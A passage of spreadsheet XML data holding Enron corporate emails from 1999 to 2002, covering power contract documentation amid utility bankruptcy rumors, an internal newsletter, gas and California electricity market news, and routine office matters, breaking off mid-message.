    <t xml:space="preserve">Tracy,_x000D_
_x000D_
Yesterday at the EEI conference I had lunch with Sierra Pacific's credit, _x000D_
risk, and power contracting folks.  Their credit person (Pamela Hirts) is new _x000D_
and was very interested in learning how to manage credit and risk through the _x000D_
EEI.  I think they might be receptive to negotiating an EEI with Enron.  If _x000D_
the bankruptcy rumors are true, we want to make sure that we have the EEI _x000D_
setoff language in place._x000D_
_x000D_
Stop by today and we can coordinate our efforts._x000D_
_x000D_
Steve_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rhonda L Denton_x000D_
04/18/2001 01:35 PM_x000D_
To: Tracy Ngo/PDX/ECT@ECT_x000D_
cc: Kim S Theriot/HOU/ECT@ECT, Elizabeth Sager/HOU/ECT@ECT, Christian _x000D_
Yoder/HOU/ECT@ECT, Steve C Hall/PDX/ECT@ECT, William S _x000D_
Bradford/Enron@EnronXGate, Tanya Rohauer/Enron@EnronXGate, Edward _x000D_
Sacks/Enron@EnronXGate, Paul Radous/Enron@EnronXGate, Wendy _x000D_
Conwell/NA/Enron@Enron, Veronica Gonzalez/Enron@EnronXGate, Jason R _x000D_
Williams/Enron@EnronXGate _x000D_
_x000D_
Subject: Re: Sierra Pacific Power and Nevada Power confirmations  _x000D_
_x000D_
We confirm both of these entitites under the WSPP form of confirm_x000D_
_x000D_
_x000D_
_x000D_
Tracy Ngo_x000D_
04/18/2001 11:35 AM_x000D_
To: Rhonda L Denton/HOU/ECT@ECT_x000D_
cc: Kim S Theriot/HOU/ECT@ECT, Elizabeth Sager/HOU/ECT@ECT, Christian _x000D_
Yoder/HOU/ECT@ECT, Steve C Hall/PDX/ECT@ECT, William  S _x000D_
Bradford/Enron@EnronXGate, Tanya Rohauer/Enron@EnronXGate, Edward _x000D_
Sacks/Enron@EnronXGate, Paul Radous/Enron@EnronXGate, Wendy _x000D_
Conwell/NA/Enron@Enron, Veronica Gonzalez/Enron@EnronXGate, Jason R _x000D_
Williams/Enron@EnronXGate _x000D_
Subject: Sierra Pacific Power and Nevada Power confirmations_x000D_
_x000D_
Rhonda,_x000D_
_x000D_
Can you confirm for me the forms of confirmations that we have been using to _x000D_
confirm our physical power transactions with both Sierra Pacific Power and _x000D_
Nevada Power?  We do not have a "golden" master agreement, so I believe that _x000D_
the transactions are probably confirmed under the WSPP._x000D_
_x000D_
Given the bankruptcy noise for both utilities, I'd like to be able to get our _x000D_
arms around all of our documentation.  Please advise as to the timeliness on _x000D_
getting this information and if we need to pull legal/credit resources to _x000D_
assist or if you are not the point of contact on this matter._x000D_
_x000D_
Thanks,_x000D_
Tracy_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/02/2001=_x000D_
=20_x000D_
03:03 PM ---------------------------_x000D_
   ENA Public Relations_x000D_
From: ENA Public Relations@ENRON on 03/01/2001 06:13 PM_x000D_
Sent by: Enron Announcements@ENRON_x000D_
To: All_ENA_EGM_EIM_x000D_
cc: =20_x000D_
Subject: EnTouch Newsletter_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
BUSINESS HIGHLIGHTS_x000D_
_x000D_
Weather Risk Management_x000D_
Next week, Jeff Shankman and Mark Tawney will be attending the Weather Risk=_x000D_
=20_x000D_
Management Association (WRMA) conference in Tokyo. There has been=20_x000D_
a lot of interest in Japanese weather derivatives to-date.  Even though Jap=_x000D_
an=20_x000D_
is geographically a relatively small country, due to elevation differences,=_x000D_
=20_x000D_
there are several different climates and within each of those areas, there=_x000D_
=01,s=20_x000D_
a significant amount of volatility in day-to-day and season-to-season=20_x000D_
weather. By leveraging EnronOnline and our global portfolio approach, Enron=_x000D_
=20_x000D_
Global Markets will be the dominant weather market player in Japan, as we a=_x000D_
re=20_x000D_
in_x000D_
the US, Australia and Europe._x000D_
_x000D_
COMING SOON - New EWS Training Web Site_x000D_
Ernie is retiring and there is a new tool to help you manage your=20_x000D_
professional development. It=01,s called InvestInMe.enron.com and it is the=_x000D_
 key=20_x000D_
to your future. In a=20_x000D_
user-friendly format, you will find the current listing of internal program=_x000D_
s,=20_x000D_
access to a database of external programs, and registration for on-line=20_x000D_
courses._x000D_
Watch for details in your email.  Launch date is Tuesday, March 6, 2001._x000D_
_x000D_
_x000D_
IN THE NEWS_x000D_
_x000D_
Analyst Robert C. Ollech, vice president and portfolio manager at Ziegler=_x000D_
=20_x000D_
Investment Services Group, says Wall Street will like Enron even more as=20_x000D_
demand for natural gas increases, volume continues to grow on its online=20_x000D_
marketplace and as the company's broadband business starts making money. =_x000D_
=20_x000D_
Enron, which has beat analysts' estimates in five of the past seven quarter=_x000D_
s,=20_x000D_
is not a cheap stock. But Ollech says its relatively young management team =_x000D_
is=20_x000D_
focused on maximizing systems and business lines it has spent five years=20_x000D_
developing. Plus, the company is selling such assets as a power plant in=20_x000D_
Oregon, moves Ollech says could boost its return on equity to 18% or higher=_x000D_
=20_x000D_
from the present 12%. "This is an innovative story that's finally getting=_x000D_
=20_x000D_
out," Ollech says. 02/25/2001  The Milwaukee Journal Sentinel._x000D_
_x000D_
_x000D_
WELCOME_x000D_
New Hires_x000D_
ENA =01) Angelic Davis, Dipak Agarwalla, Sean Maki, Juliann Kemp, Bridget F=_x000D_
raser_x000D_
EIM =01) Louis Amo_x000D_
Transfers_x000D_
EGM =01) Patrick Conner_x000D_
EIM =01) Douglas Seaworth_x000D_
ENA =01) Eric Feitler, Santiago Garcia, Philip Polsky, Lauren Schlesinger_x000D_
_x000D_
NUGGETS &amp; NOTES_x000D_
_x000D_
=01&amp;If you=01,re not trading EOL, you=01,re not trading.=018 =01) John L. W=_x000D_
ilson, Vice=20_x000D_
President/EGM_x000D_
_x000D_
=01&amp;Training=01(.all the cool kids are doing it!=018 =01) Tom Wilbeck/ENA_x000D_
_x000D_
Congratulations to Michelle and David Vitrella, manager of trading/EGM.  Th=_x000D_
ey=20_x000D_
are the proud parents of a baby girl born February 27 weighing_x000D_
over 9 lbs._x000D_
_x000D_
NEWS FROM THE GLOBAL FLASH_x000D_
_x000D_
International_x000D_
World Watch_x000D_
Compiled by David I. Oyama_x000D_
Enron Seeks Deals for Japanese Assets=20_x000D_
The Japanese unit of U.S. power producer and trader Enron is considering=20_x000D_
asset swaps with Japanese power companies, in a deal that would make Enron=_x000D_
=20_x000D_
the first_x000D_
foreign company to buy a Japanese power plant. An Enron Japan official said=_x000D_
=20_x000D_
it is talking to power companies and "owners of power generators in Japan=_x000D_
=20_x000D_
about=20_x000D_
the possibility of asset exchanges," confirming a report in the Japanese=20_x000D_
business daily Nihon Keizai Shimbun. The report also said Enron Japan may=_x000D_
=20_x000D_
enter deals_x000D_
with Japanese companies for joint power-generation acquisitions abroad.=20_x000D_
Japanese deregulation measures have opened the door to new foreign and=20_x000D_
domestic=20_x000D_
competitors in an industry dominated for years by 10 regional Japanese firm=_x000D_
s.=20_x000D_
Enron Japan was established last May, two months after deregulation measure=_x000D_
s_x000D_
were passed allowing nonutility companies to begin supplying power to large=_x000D_
=20_x000D_
commercial users such as shopping centers and office towers._x000D_
03/01/2001  The Wall Street Journal  (Copyright (c) 2001, Dow Jones &amp;=20_x000D_
Company, Inc.)_x000D_
_x000D_
=20_x000D_
LEGAL STUFF_x000D_
The information contained in this newsletter is confidential and proprietar=_x000D_
y=20_x000D_
to Enron Corp. and its subsidiaries.  It is intended for internal use only =_x000D_
and_x000D_
should not be disclosed._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 18 Mar 2001 12:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'binky.davidson@enron.com'})</t>
  </si>
  <si>
    <t>Re: NewPower Withdrawal Notes</t>
  </si>
  <si>
    <t xml:space="preserve">How about inserting the attached (after the explanation about the _x000D_
relationship between New Power and Enron)?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Binky Davidson@EES_x000D_
	03/15/2001 05:35 PM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: NewPower Withdrawal Notes_x000D_
_x000D_
Mark Muller sends the attached for your information and comments._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 00:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rob.bradley@enron.com', 'elizabeth.linnell@enron.com', 'james.steffes@enron.com', 'richard.shapiro@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Bracing for the Gas Price Storm - CERA Watch</t>
  </si>
  <si>
    <t xml:space="preserve">This  is  a very good snapshot  of the North American  gas market  at  the=_x000D_
=20_x000D_
moment...fyi..Margaret_x000D_
---------------------- Forwarded by Margaret Carson/Corp/Enron on 11/07/200=_x000D_
0=20_x000D_
08:06 AM ---------------------------_x000D_
_x000D_
_x000D_
webmaster@cera.com on 11/06/2000 05:09:35 PM_x000D_
To: Margaret.Carson@enron.com_x000D_
cc: =20_x000D_
_x000D_
Subject: Bracing the Storm - CERA Watch_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
CERA Watch: Sent Mon, November 06, 2000_x000D_
**********************************************************************_x000D_
_x000D_
Title: Bracing the Storm_x000D_
Author: N. American Gas Team_x000D_
E-Mail Category: Watch_x000D_
Product Line: North American Gas ,_x000D_
URL: http://www.cera.com/cfm/track/eprofile.cfm?u=3D3014&amp;m=3D1409 ,_x000D_
_x000D_
Alternative URL:=20_x000D_
http://www.cera.com/client/nag/wch/110100_16/nag_wch_110100_16_ab.html_x000D_
**********************************************************************_x000D_
_x000D_
The record high gas prices of this summer and fall and the questions_x000D_
regarding supply adequacy for this winter have focused attention on_x000D_
natural gas far beyond the confines of the direct market participants._x000D_
The national media, regulators, politicians, industrial groups, and_x000D_
consumer advocates have all raised concerns about what will transpire_x000D_
in terms of prices and availability this winter=01*and what can be done_x000D_
about it. These conditions, however, are a culmination of trends that_x000D_
have been developing in the gas market for five years or more; reversal_x000D_
of these trends is likely to require more than one season or even one_x000D_
year. In this environment, prices in the $4.00 to $5.00 per MMBtu_x000D_
range have become the norm and will be sustained into the winter._x000D_
Equally important, further spikes to the $6.00 to $7.00 range cannot be_x000D_
ruled out._x000D_
_x000D_
**end**_x000D_
_x000D_
Follow URL for complete report._x000D_
_x000D_
_x000D_
_x000D_
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20_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 Aug 2000 02:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'michaelberg@icfconsulting.com', 'amosher@appanet.org', 'doornbos@socrates.berkeley.edu', 'hcameron@uclink.berkeley.edu', 'whederman@columbiaenergygroup.com', 'lfried@uclink.berkeley.edu'})</t>
  </si>
  <si>
    <t>Meeting next week on GSPP Power Summit</t>
  </si>
  <si>
    <t>Coordinating committee,_x000D_
Let's take Bill up on his generous offer to arrange a conference call next _x000D_
week,_x000D_
and to try to get a speaker list so we can get that established and put out_x000D_
advertising.  This issue is so hot I'm worried about getting scooped by _x000D_
someone_x000D_
else.  See attached Wall Street Journal article saying the leader of the free_x000D_
world is now interested._x000D_
_x000D_
How is 6pm Eastern/3pm Western as a standard time to have a weekly call?_x000D_
_x000D_
What days work next week?_x000D_
_x000D_
I'll send a message Monday with a date, time, and agenda after I hear from_x000D_
everyone, including Jeff Dasovich who is away til then._x000D_
Rob_x000D_
_x000D_
August 24, 2000_x000D_
Clinton Seeks Stepped-Up Probe_x000D_
Into Increasing Electricity Prices_x000D_
By REBECCA SMITH and JOHN J. FIALKA_x000D_
Staff Reporters of THE WALL STREET JOURNAL_x000D_
WASHINGTON -- The Clinton Administration and federal energy regulators stepped_x000D_
up efforts to respond to a politically disastrous rise in California _x000D_
electricity_x000D_
prices, threatening to go as far as re-regulating some prices if they _x000D_
determine_x000D_
that the free-market experiment in the state has failed._x000D_
The moves by federal authorities come as California regulators and lawmakers_x000D_
scramble to come up with an expedient solution to high power prices in the San_x000D_
Diego area, where monthly bills have in some cases quadrupled since last _x000D_
summer._x000D_
'Workably Competitive'_x000D_
In a 21-page order issued Wednesday, the Federal Energy Regulatory Commission_x000D_
said that under the Federal Power Act it can intervene to limit the prices_x000D_
charged by generators to the California market -- if it determines the prices_x000D_
they are charging aren't "just and reasonable," and the market is not _x000D_
"workably_x000D_
competitive."_x000D_
The order accompanied an upgrade of the FERC's effort from a staff probe to a_x000D_
formal investigation, requested by President Clinton, who also Wednesday_x000D_
extended $2.6 million in federal emergency loans to low-income residents in _x000D_
the_x000D_
San Diego area to help pay their electric bills._x000D_
"There is a crisis of confidence in California wholesale electricity markets_x000D_
that threatens to erode the political consensus necessary to sustain a_x000D_
market-based approach to regulation," William Massey, one of four FERC_x000D_
commissioners, said Wednesday in an opinion attached to the order. "In these_x000D_
circumstances, the FERC must act forcefully and decisively to ... insist that_x000D_
jurisdictional wholesale markets produce consumer benefits and just and_x000D_
reasonable rates."_x000D_
As prices have risen, power generators such as Duke Energy_x000D_
&lt;/pj/q-quote.cgi?sym=duk&amp;type=company&gt; Co., the local utility, San Diego Gas &amp;_x000D_
Electric Co. and public officials have all pointed the finger at one another _x000D_
for_x000D_
what appears to be a badly flawed market. California governor Gray Davis, who _x000D_
is_x000D_
pushing for local legislation that would lower bills and accelerate _x000D_
power-plant_x000D_
construction, Wednesday said "out-of-state generators" were most responsible _x000D_
for_x000D_
"bringing San Diego residents to their knees."_x000D_
FERC's action Wednesday originated in a complaint filed Aug. 2 by San Diego _x000D_
Gas_x000D_
&amp; Electric, a unit of Sempra Energy &lt;/pj/q-quote.cgi?sym=sre&amp;type=company&gt;, _x000D_
the_x000D_
utility whose customers have raised the most outrage over the rate rises._x000D_
The utility sold off its plants and now buys all the power its customers use _x000D_
out_x000D_
of a state-sanctioned auction, passing those market costs directly through to_x000D_
its customers._x000D_
A Warning to Generators_x000D_
Steve Baum, Sempra Energy chairman, said FERC's action is a warning to_x000D_
generators "that the prices they've been receiving are now at risk." He _x000D_
expects_x000D_
FERC to eventually issue a ruling that California's market isn't competitive,_x000D_
setting the stage for a possible return to cost-based rates in periods of high_x000D_
demand. Prior to deregulation in 1998, the rates utilities charged for_x000D_
electricity were based on their underlying cost. Deregulation allowed them to_x000D_
charge whatever the market would bear._x000D_
California's Governor Orders Regulators to Slash Electric Rates in Southern_x000D_
Areas (Aug. 10)_x000D_
Mr. Clinton said the FERC investigation would allow Washington to "better_x000D_
understand" what is happening in the California market so the government can_x000D_
protect consumers there and in other deregulated states._x000D_
While politicians and regulators seek solutions, wholesale power prices in_x000D_
California are becoming more aberrant._x000D_
Even on days when consumption and prices normally drop, such as Sundays, _x000D_
prices_x000D_
have been stubbornly high this summer. For example, the auction price of_x000D_
electricity to be consumed at 10 p.m. last Sunday was $125.48 per megawatt, or_x000D_
more than four times the price such power commanded on the third Sunday of_x000D_
August in 1999. The markup is especially noteworthy because actual demand on_x000D_
that day was 12% lower than on the comparable day a year earlier._x000D_
"A number of people are looking at the high prices trying to figure out what's_x000D_
going on," says Jesus Arredondo, spokesman for the state-sanctioned entity _x000D_
that_x000D_
runs the state's day-ahead energy auction, the California Power Exchange in_x000D_
Pasadena, Calif._x000D_
These prices have remained high despite the best efforts of public officials._x000D_
For instance, the organization that runs the state's electric grid and is_x000D_
responsible for keeping consumers constantly supplied with electricity has_x000D_
reduced the maximum price it will pay for electricity this summer to $250 per_x000D_
megawatt hour from $750. While this action has capped peak prices, it has also_x000D_
caused an increase in the overall number of hours in which prices are _x000D_
abnormally_x000D_
high._x000D_
Take Wednesday for instance. Prices for power in California never dropped _x000D_
below_x000D_
$108 per megawatt hour, even for power contracted for delivery in the dead of_x000D_
night, and the hourly price was at or above $200 in 13 of 24 hours despite _x000D_
only_x000D_
moderately high demand._x000D_
California's problems are likely to step up pressure on Congress to pass _x000D_
omnibus_x000D_
legislation which would provide uniform national rules for deregulated state_x000D_
energy markets and make more efficient the interstate power-transmission _x000D_
system,_x000D_
Mr. Clinton said Wednesday._x000D_
The administration has pushed for such a measure but the House Commerce_x000D_
Committee, which has jurisdiction over the legislation, still appears _x000D_
deadlocked_x000D_
on the details. It plans to hold a hearing in California on electricity-market_x000D_
conditions there next month._x000D_
-- Marc Lifsher contributed to this article._x000D_
Write to Rebecca Smith at rebecca.smith@wsj.com &lt;mailto:rebecca.smith@wsj.com&gt;_x000D_
and John J. Fialka at john.fialka@wsj.com &lt;mailto:john.fialka@wsj.com&gt;</t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 04:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: deal 541638</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Kate, _x000D_
_x000D_
Can you please let Phil know that he should be testing deals in the enpower _x000D_
test database not the actual system.  _x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                03/09/2001 12:20 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: deal 541638  _x000D_
_x000D_
This was just a practice deal entered by Phil yesterday to test our new _x000D_
version of deal entry. He zeroed out the volume, but neglected to kill the _x000D_
deal or at least change it to no confirm. So this is NOT a good deal - I'm _x000D_
killing it now._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/09/2001 09:46 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: deal 541638_x000D_
_x000D_
Kate can you ask Phil Platter is Dane Energy Corp the correct broker on this _x000D_
deal?_x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 04:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.sherriff@enron.com', 'michael.brown@enron.com'})</t>
  </si>
  <si>
    <t>Organizational Announcement Memo</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the organizational announcement with changes.  Please review and _x000D_
respond._x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Nov 2001 14:53:43 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'victoria.versen@enron.com', 'judy.townsend@enron.com', 'w..pereira@enron.com', 'scott.loving@enron.com', 'brad.mckay@enron.com', 'scott.goodell@enron.com', 'scott.neal@enron.com', 'andrea.ring@enron.com', 'ruth.concannon@enron.com', 'craig.taylor@enron.com', 'robin.barbe@enron.com', 'jonathan.mckay@enron.com', 'leonidas.savvas@enron.com', 'f..keavey@enron.com', 'vladi.pimenov@enron.com', 't..zivley@enron.com', 'chris.germany@enron.com', 'chuck.ames@enron.com', 'jared.kaiser@enron.com', 'jim.willis@enron.com', 'shauywn.smith@enron.com', 'gil.muhl@enron.com', 'maureen.smith@enron.com', 'f..brawner@enron.com', 'john.hodge@enron.com', 'david.jones@enron.com'})</t>
  </si>
  <si>
    <t>Clean Sweep</t>
  </si>
  <si>
    <t>I am coming in this weekend to box up for the big move........ Please go through the large black file cabinet and the beige and purge, anything you don't want.  There will be dumpsters along the floor tomorrow afternoon.  I have your move packets and I will issue them later next week.  There is a 6 Box MAXIMUM......    If you have more than that, the movers will only move 6 boxes.  There will be 2 sets of drawers.  If you have any other questions, please ask me._x000D_
_x000D_
Kimberly Bates_x000D_
East Gas/Origination_x000D_
713-853-5193_x000D_
713-646-8453 Fax</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 12:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: TVA System Impact Study</t>
  </si>
  <si>
    <t>Change the request to 150 MW per period._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Wed, 3 May 2000 05:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>MHI 501G</t>
  </si>
  <si>
    <t>Ben_x000D_
_x000D_
Looks like a 2 X 1 MHI 501G plant would produce about 684MW plant net output _x000D_
at a heat rate of 6684 Btu/kWhr net new&amp;clean. _x000D_
_x000D_
Still looking for capital cost._x000D_
_x000D_
Bruce</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 22:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.cowan@enron.com'})</t>
  </si>
  <si>
    <t>Re: Fridge Clean-Out</t>
  </si>
  <si>
    <t>I think I have a lasagna in there. You can have it._x000D_
_x000D_
cd</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 15:02:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michelle.overton@elpaso.com'})</t>
  </si>
  <si>
    <t>Capacity</t>
  </si>
  <si>
    <t>I'm looking for the following capacity, let me know if you have it to sell._x000D_
_x000D_
Z0 or ZL to Z4 - Carrol County Meter, 1,000 day for Nov-mar and Nov-1year._x000D_
_x000D_
Z0 or Zl to Broad Run, 10,000 day for Nov-mar.  I think Corey showed a demand $.22 before which is above TCO pool by about $.17.  Let me know._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Wed, 11 Oct 2000 10:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Meeting with PG&amp;E, Gas Accord OII</t>
  </si>
  <si>
    <t xml:space="preserve">Vail???  Flagstaff??? Man, I'm in the wrong business.  Now listen Stumpy, if _x000D_
you think you're going to Vail so some half-#%$#ed customer can run over your _x000D_
OTHER knee with a snow mobile, right before your wedding, well think again, _x000D_
buster._x000D_
_x000D_
I'll see if we can set up a meeting on Thursday the 2nd._x000D_
_x000D_
Signed,_x000D_
Stuck in Lodi Again_x000D_
_x000D_
_x000D_
_x000D_
	Jeffery Fawcett_x000D_
	10/11/2000 03:39 PM_x000D_
		 _x000D_
		 To: Jeff Dasovich/NA/Enron@Enron_x000D_
		 cc: Susan Scott/ET&amp;S/Enron@ENRON_x000D_
		 Subject: Meeting with PG&amp;E, Gas Accord OII_x000D_
_x000D_
Jeff,_x000D_
Got your voicemail and I think you've got the right idea.  I spoke with the _x000D_
lovely Ms. Scott and she and I agreed that: (1) we don't want to endure a _x000D_
marathon afternoon (or two) of PG&amp;E preaching the Gospel according to Baja _x000D_
Path, and (2) a more compressed 2-hour, mano-y-mano visit with Mr. Cherry to _x000D_
discuss Enron's and Transwestern's position in the Gas Accord would be much _x000D_
more useful to all parties.  Given the fact that TW has another customer _x000D_
meeting next week in Vail, and I've made a tentative commitment to meet with _x000D_
a customer in Flagstaff the following week, the only time I can reasonably _x000D_
fit in a trip to visit PG&amp;E would be to arrive Wed. night, Nov. 1, and meet _x000D_
Thursday a.m., Nov. 2.  (Remember, I'm getting married that Saturday, Nov. _x000D_
4th!!!)_x000D_
_x000D_
If we can't work this schedule out, then, in order to include me, we'll have _x000D_
to wait until I get back in mid-November.  If you think TW needs to get the _x000D_
face time a little earlier, maybe you and Ms. Scott can meet with him without _x000D_
the benefit of me dragging you down. _x000D_
_x000D_
Will you get back with us?  Thanks._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Mar 2002 09:55:43 -0800 (PST)</t>
  </si>
  <si>
    <t>Energy Derivatives/Electric Power Seminars - Houston</t>
  </si>
  <si>
    <t xml:space="preserve">Energy Derivatives/Electric Power Seminars (&lt;b&gt;Houston (April)&lt;/b&gt;)_x000D_
 _x000D_
Successful people take the time needed to increase their value to the organization. _x000D_
_x000D_
For information on PGS Energy Training's upcoming _x000D_
seminars in downtown Houston _x000D_
(in April) please call 412-279-9298 or visit &lt;a _x000D_
href="http://www.pgsenergy.com/schedule.html"&gt;_x000D_
http://www.pgsenergy.com/schedule.html&lt;/a _x000D_
_x000D_
Available seminars include:_x000D_
_x000D_
1) Fundamentals of Energy Futures, Options &amp; _x000D_
Derivatives _x000D_
&lt;br&gt;_x000D_
_x000D_
2) Fundamentals of the Electric Power Industry&lt;br&gt; _x000D_
_x000D_
3) Gas-to-Electricity Arbitrage &amp; How to Maximize the _x000D_
Profitability of Electric Generation Assets&lt;br&gt; _x000D_
_x000D_
4) Developing Effective Risk Management Policies &amp; _x000D_
Procedures (John Wengler) &lt;br&gt;_x000D_
_x000D_
5) Fundamentals of Statistical Analysis (Dr. Ken Skinner) _x000D_
&lt;br&gt;_x000D_
_x000D_
6) How to Value Electric Generation Assets as Real _x000D_
Options&lt;br&gt; _x000D_
_x000D_
7) Fundamentals of Value-at-Risk (Soli Forouzan)_x000D_
_x000D_
Save money by bringing a group of 4 or more. &lt;p&gt;_x000D_
_x000D_
With a group rate, your cost for a $1,295 seminar is _x000D_
reduced to $895 per attendee-- a savings of $1,600 from _x000D_
regular prices. The group price for the $695 programs is _x000D_
$495. &lt;p&gt;_x000D_
_x000D_
Please forward this to anyone who might benefit from a _x000D_
better understanding of energy derivatives, risk _x000D_
management, gas-to-electricity arbitrage, statistics or _x000D_
electric power trading._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
John Adamiak_x000D_
PGS Energy Training_x000D_
------------------------------------------------_x000D_
email: john@pgsenergy.com_x000D_
voice: 412-279-9298_x000D_
web: http://www.pgsenergy.com/schedule.html_x000D_
------------------------------------------------_x000D_
_x000D_
This email has been sent to kwatson@enron.com,_x000D_
 by PGS Energy Training._x000D_
_x000D_
Visit our Subscription Center to edit your interests or unsubscribe._x000D_
http://ccprod.roving.com/roving/d.jsp?p=oo&amp;m=1000838503237&amp;ea=kwatson@enron.com_x000D_
_x000D_
View our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp_x000D_
_x000D_
Powered by_x000D_
Constant Contact(R)_x000D_
www.constantcontact.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'treasa.kirby@enron.com'})</t>
  </si>
  <si>
    <t>Re: Prepaid swap</t>
  </si>
  <si>
    <t xml:space="preserve">I don't know a thing about this deal!  I am expecting Marcus to call me this _x000D_
morning for further explanation.  Forgive my ignorance, but what is a CACS?  _x000D_
Thanks.  Sara_x000D_
_x000D_
_x000D_
_x000D_
	Treasa Kirby_x000D_
	11/14/2000 08:37 AM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Prepaid swap_x000D_
_x000D_
Sara,_x000D_
Do we need to complete a CACS form for this deal and if so does it need to be _x000D_
signed off by London or Houston as ENA are executing the deal ?_x000D_
_x000D_
Regards_x000D_
---------------------- Forwarded by Treasa Kirby/LON/ECT on 14/11/2000 14:39 _x000D_
---------------------------_x000D_
_x000D_
_x000D_
carrd2@tdcibg.com on 09/11/2000 19:06:35_x000D_
To: tkirby@enron.com_x000D_
cc: Cori_Novellino@TDBANK-US.tdsecurities.com, _x000D_
Graeme_Francis@TDBANK-UK.tdsecurities.com _x000D_
_x000D_
Subject: Prepaid swap_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
At the request of Graeme Francis in our London office, attached please find a_x000D_
copy of the ISDA Master Agreement b/w Enron Capital &amp; Trade Resources Corp. (I_x000D_
believe this is now Enron North America??) and Toronto Dominion (Texas), Inc._x000D_
_x000D_
Regards,_x000D_
Dan Carr_x000D_
(416) 983-9473_x000D_
_x000D_
_x000D_
(See attached file: Enron.doc)_x000D_
_x000D_
 - Enron.doc_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 16 Aug 2000 01:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'melanie.hawkins@apg.amedd.army.mil', 'tony.pitrat@apg.amedd.army.mil', 'david.daughdrill@apg.amedd.army.mil', 'erik.janus@apg.amedd.army.mil', 'matthew.bazar@apg.amedd.army.mil', 'jeffrey.leach@apg.amedd.army.mil', 'hsieng-ye.chang@apg.amedd.army.mil', 'lawrence.tannenbaum@apg.amedd.army.mil', 'winifred.palmer@apg.amedd.army.mil', 'ronie.shackelford@apg.amedd.army.mil', 'farhana.fathimulla@apg.amedd.army.mil', 'gburk@aol.com', 'mark.taylor@enron.com', 'wsc99@juno.com', 'ludwiggh@visuallink.com', 'keith.hoddinott@apg.amedd.army.mil', 'mike.white@apg.amedd.army.mil', 'donnelly@usgs.gov', 'joe_biddle@abrealty.com', 'bonnie.gaborek@apg.amedd.army.mil', 'matthew.mcatee@apg.amedd.army.mil', 'sniggy@mindspring.com', 'laura.peters@apg.amedd.army.mil', 'depayton@aol.com', 'sludwig@comdt.uscg.mil', 'dennis.druck@apg.amedd.army.mil'})</t>
  </si>
  <si>
    <t>couldn't wait 'til next week</t>
  </si>
  <si>
    <t xml:space="preserve"> - 1st contact.jpg</t>
  </si>
  <si>
    <t>Mon, 13 Dec 1999 23:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Aquila</t>
  </si>
  <si>
    <t xml:space="preserve">My understanding ( as of last week) was that trades done Online were binding _x000D_
to the counterparty holding the ID under which the trade was transacted, and _x000D_
that confirms (if needed) would we done in that name. A follow up procedure _x000D_
was discussed for written assignment to the "correct" counterparty.  This was _x000D_
not the case yesterday, where the deal was changed internally to the _x000D_
"correct" counterparty without a written assignment._x000D_
_x000D_
Mark, Jeff, please comment on the the legal aspects of doing these moves _x000D_
internally without a written assignment. Does a verbal OK from each _x000D_
counterparty (assignor and assignee)  suffice?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Debbie_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Kathryn Cordes_x000D_
	12/13/99 05:15 PM_x000D_
	_x000D_
To: Bob Shults/HOU/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Jennifer _x000D_
